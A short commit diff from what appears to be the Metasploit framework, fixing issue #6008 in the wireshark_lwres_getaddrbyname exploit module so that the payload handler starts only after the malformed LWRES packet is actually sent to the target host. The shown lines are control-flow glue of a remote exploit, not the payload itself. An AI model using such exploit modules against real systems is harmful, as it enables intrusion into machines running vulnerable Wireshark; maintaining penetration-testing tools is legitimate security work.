Fix #6008 for wireshark_lwres_getaddrbyname
parent
bbd08b84e5
commit
bd2f73f40a
|
@ -204,10 +204,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
p.payload = sploit
|
p.payload = sploit
|
||||||
p.recalc
|
p.recalc
|
||||||
|
|
||||||
capture_sendto(p, rhost)
|
sent = capture_sendto(p, rhost)
|
||||||
close_pcap
|
close_pcap
|
||||||
|
|
||||||
handler
|
handler if sent
|
||||||
else
|
else
|
||||||
print_status("Sending malformed LWRES packet to #{rhost}")
|
print_status("Sending malformed LWRES packet to #{rhost}")
|
||||||
connect_udp
|
connect_udp
|
||||||
|
|
Loading…
Reference in New Issue